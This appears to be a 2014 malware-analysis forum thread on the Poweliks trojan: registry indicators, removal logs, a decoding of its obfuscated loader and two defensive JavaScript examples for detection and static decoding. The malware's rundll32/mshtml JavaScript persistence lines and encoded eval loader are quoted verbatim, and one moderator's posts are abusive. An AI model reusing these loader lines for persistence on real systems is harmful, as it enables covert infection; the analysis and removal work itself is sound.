Win32/Poweliks

Forum for analysis and discussion about malware.
EP_X0FF
Global Moderator
Posts: 4888
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Sun Aug 03, 2014 3:03 pm

Everything already attached here.

Besides the usual copy-pasting, AV "analysts" added a few mistakes; I especially like the TrendMicro piece of shit analysis (not to mention how incomplete it is):

Just a f*cken FYI to all of these "malware analysts": there is no ZwXxx in usermode. All ZwXxx are equal to NtXxx. If you do the analysis, do not be like the ignorant trojan authors who just use Zw prefix because all code learned/copy-pasted for years from incompetent Gary Nebbett book.
Last edited by EP_X0FF on Mon Aug 04, 2014 1:32 pm, edited 2 times in total.
Reason: edit: fixed mistake with SHA1 report
Ring0 - the source of inspiration
Quads
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand

Tue Aug 05, 2014 7:23 am

Possibly a Poweliks key in the FRST log, and not Za as MBAM / MBAR detected it as

InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\ <*>] <===== ATTENTION

From 5 days ago.

Quads
EP_X0FF
Global Moderator
Posts: 4888
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Wed Aug 06, 2014 3:32 am

Post to idiotic analysis disapproved.

Excuse but such low quality shit (level of hackforums and opensc) is not for this place. Especially when it starts with this nonsense:
At entry point of first sample, it does have some odd API calls:
* Call to IsCharSpaceW("8") which is false
* Loop through each letter of "CLEAR" text using StrChrW and IsCharAlphaW which will return true per each letter
* Call to lstrcmpiW with two arguments "NEST" and "NEST", so basically it will also return true
* Call to OpenProcess with 0 as PID argument.
* Call to GetSystemDirectoryA
* Call to GetFileInformationByHandle and passing NULL as handle.
* Add non-unicode "BASIC" string into global atom table using Unicode version of GlobalAddAtomW API.
* Call to SizeofResource with NULL as hResource and hModule arguments.
* Call to IsDBCSLeadByteEx with 0x839 as codepage argument and 0x23 as testchar argument. As 0x23 is not a lead byte, it will always return 0.
Cryptor random generated junk is not an entry point rofl, why should I explain such noob things?

junk, carefully described by this homemade virus analyst (he can try itself at McAfee or TrendMicro, their companies full of such "analysts")
Image

entry point of malware, feel the difference.
Image
This file is compressed using MPRESS version 0.81-2.xx
FYI for the idiot: MPRESS version is stored as plain text in compressed file header.
Ring0 - the source of inspiration
Naathim
Posts: 1
Joined: Thu May 29, 2014 12:15 pm

Fri Aug 29, 2014 12:13 pm

Hello.

Looks like there is some new variant of Poweliks, which infects another CLSID (or maybe it's just the XP speciality), which I'm fighting here: https://forums.malwarebytes.org/index.p ... le-issues/
Aside from the forged Run subkey, there is another one:
[HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>]

Does anybody have a dropper for it?
Quads
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand

Fri Aug 29, 2014 5:45 pm

The Registry key(s) have a null in them. That is why FRST, Roguekiller etc. struggle in removing the key(s) even if they say they have done so.

A test I did with Poweliks on my system (no VM or sandbox etc.). It took longer due to me just testing FRST and Roguekiller a few weeks ago. There can always be new Reg key changes by Poweliks


Poweliks in log FRST

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current (the data entry has 31 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).

InvalidSubkeyName: [HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] <===== ATTENTION


Try removal

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**a<*> => Value Deleted Successfully.
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
[HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] => Subkey with invalid name deleted successfully.


Rescan, oh 2 keys still there, try again

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current (the data entry has 31 more characters). <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).

Try removal, round 2


HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**a<*> => Value Deleted Successfully.
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.

Still holding in location, check null


Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\Marewa>C:\Users\John\Desktop\regdelnull hku -s

RegDelNull v1.10 - Delete Registry keys with embedded Nulls
Copyright © 2005-2006 Mark Russinovich
Sysinternals - www.sysinternals.com

Null-embedded key (Nulls are replaced by '*'):

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\Cu
rrentVersion\Run\|*|

Delete? (y/n)


Ok try the one other tool (Roguekiller)


[Tr.Poweliks] HKEY_USERS\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run | ?a : rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") -> DELETED

Now check for the 2 entries

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).
InvalidSubkeyName: [HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] <===== ATTENTION

Nope still there, time to remove Null


Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\Marewa>C:\Users\John\Desktop\regdelnull hku -s

RegDelNull v1.10 - Delete Registry keys with embedded Nulls
Copyright © 2005-2006 Mark Russinovich
Sysinternals - www.sysinternals.com

Null-embedded key (Nulls are replaced by '*'):

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\Cu
rrentVersion\Run\|*|

Delete? (y/n) y

key successfully deleted.

Scan complete



Check for the 2 entries, OK, one left, null is now gone



HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1 (the data entry has 824 more characters).


HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.

Completed, Poweliks gone


If tools are struggling or cannot remove an item for Poweliks, check for a null

Quads
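The indicators visible in the FRST lines of the post above, turned into a small triage pass over log lines. This is an added example, not part of the post and not FRST's own logic; the `LOG` lines are constructed (abridged from the quoted output, with a placeholder SID and a made-up benign entry), and the rule names are hypothetical.

```javascript
// Constructed sample lines, abridged from the FRST output quoted in the post.
const LOG = [
  String.raw`HKU\S-1-5-21-EXAMPLE-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write(...) <===== ATTENTION (Value Name with invalid characters)`,
  String.raw`HKU\S-1-5-21-EXAMPLE-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKx (the data entry has 824 more characters).`,
  String.raw`InvalidSubkeyName: [HKU\S-1-5-21-EXAMPLE-1000\Software\Microsoft\Windows\CurrentVersion\Run\******<*>] <===== ATTENTION`,
  String.raw`HKLM\...\Run: [ExampleAgent] => C:\Program Files\Example\agent.exe`,
];

// Split a line into key / value name / data, for the two line shapes shown in the thread.
function parseLine(line) {
  let m = /^InvalidSubkeyName: \[(.+)\]/.exec(line);
  if (m) return { kind: 'subkey', key: m[1], name: '', data: '' };
  m = /^(HK[^:]*): \[(.*?)\] => (.*)$/.exec(line);
  return m ? { kind: 'value', key: m[1], name: m[2], data: m[3] } : null;
}

// Each rule mirrors something visible in the quoted log lines.
const RULES = [
  // FRST's own annotations for names it could not represent.
  { id: 'invalid-subkey-name', test: e => e.kind === 'subkey' },
  { id: 'invalid-value-name', test: e => e.data.includes('Value Name with invalid characters') },
  // Autorun data that starts rundll32 with a javascript: URL and mshtml,RunHTMLApplication.
  { id: 'rundll32-javascript', test: e => /rundll32(\.exe)?\s+javascript:.*mshtml\s*,\s*RunHTMLApplication/i.test(e.data) },
  // "#@~^" is the marker at the start of Script Encoder (jscript.encode) output.
  { id: 'encoded-script-data', test: e => e.data.startsWith('#@~^') },
];

// Return one finding per suspicious line, with the rules that fired.
function triage(lines) {
  const findings = [];
  lines.forEach((line, i) => {
    const entry = parseLine(line);
    if (!entry) return;
    const hits = RULES.filter(r => r.test(entry)).map(r => r.id);
    if (hits.length) findings.push({ line: i + 1, key: entry.key, hits });
  });
  return findings;
}

console.log(triage(LOG));
```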
Tigzy
Posts: 384
Joined: Mon Feb 07, 2011 5:03 pm

Thu Sep 18, 2014 11:55 am

It looks like it's a new variant:
HASH: bddea208f612c06322c21def1546182b

http://forum.adlice.com/index.php/topic ... tml#msg690

How can this be deobfuscated? (between eval() )
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
EP_X0FF
Global Moderator
Posts: 4888
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Thu Sep 18, 2014 12:15 pm

Very simple.

1) Remove dots from string
2) Decrease each code symbol by 1
3) For each new element CharFromCode

epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb6e:45c3fccc1::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*
document.write('<script language=jscript.encode>'+(new ActiveXObject('WScript.Shell')).RegRead('HKCR\\clsid\\{73e709ea5d934b2ebbb099b7938da9e4}\\localserver32\\a')+'</script>'
Ring0 - the source of inspiration
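The shift-by-one decoding discussed in the two posts above, done statically so the string is never passed to `eval()`. This is an added example, not code from the thread; `RUN_VALUE` is the value data quoted in the question, embedded as an inert string, and the function names are hypothetical.

```javascript
// Constructed sample: the Run value data quoted in the thread, kept as plain text.
const RUN_VALUE = String.raw`rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))`;

// Pull out the string literal handed to eval() and the shift applied by the
// charCodeAt()+/-N callback, then undo the shift without evaluating anything.
function decodeShiftedEval(runValue) {
  const m = /eval\("([^"]*)"\.replace\(\/\.\/g,.*?charCodeAt\(\)\s*([+-])\s*(\d+)/.exec(runValue);
  if (!m) return null; // not this obfuscation scheme
  const delta = (m[2] === '-' ? -1 : 1) * Number(m[3]);
  // The loader's regex /./g matches every character, punctuation included.
  const script = Array.from(m[1], c => String.fromCharCode(c.charCodeAt(0) + delta)).join('');
  return { delta, script };
}

// List the registry locations the decoded script reads through RegRead().
function regReadTargets(script) {
  const targets = [];
  const re = /RegRead\(\s*(['"])(.*?)\1\s*\)/g;
  for (let m; (m = re.exec(script)) !== null;) {
    const path = m[2].replace(/\\\\/g, '\\'); // undo JS string-literal escaping
    const cut = path.lastIndexOf('\\');
    // RegRead treats a path ending in "\" as the key's default value.
    targets.push({ key: path.slice(0, cut), value: path.slice(cut + 1) || '(default)' });
  }
  return targets;
}

const decoded = decodeShiftedEval(RUN_VALUE);
console.log(decoded.script);
console.log(regReadTargets(decoded.script));
```

Because `/./g` matches every character, the `.` separators inside the encoded CLSID are shifted along with everything else and come out as `-`, which gives the same CLSID as the `LocalServer32` key reported in the FRST lines earlier in the thread.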
Tigzy
Posts: 384
Joined: Mon Feb 07, 2011 5:03 pm

Thu Sep 18, 2014 1:27 pm

Oh, yes I haven't seen that part (Charcode) :D
Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Thu Sep 18, 2014 3:49 pm

TwinHeadedEagle wrote:Does someone have these hashes?

4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa

Or this one?

BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A

4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
AND
BFA2DC3B9956A88A2E56BD6AB68D1F4F675A425A
are identical files just a different hash.

Here are your two files.
Quads
Posts: 148
Joined: Thu May 06, 2010 10:19 pm
Location: New Zealand

Mon Sep 29, 2014 3:03 am

Does anyone know if after using FRST to remove this key for Poweliks on a Win 7 x64 OS

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}

If the Registry key has to be repaired to

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]
@="Thumbnail Cache Class Factory for Out of Proc Server"
"AppID"="{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
@="C:\\Windows\\system32\\thumbcache.dll"
"ThreadingModel"="Apartment"

As importing a .reg file fails

Quads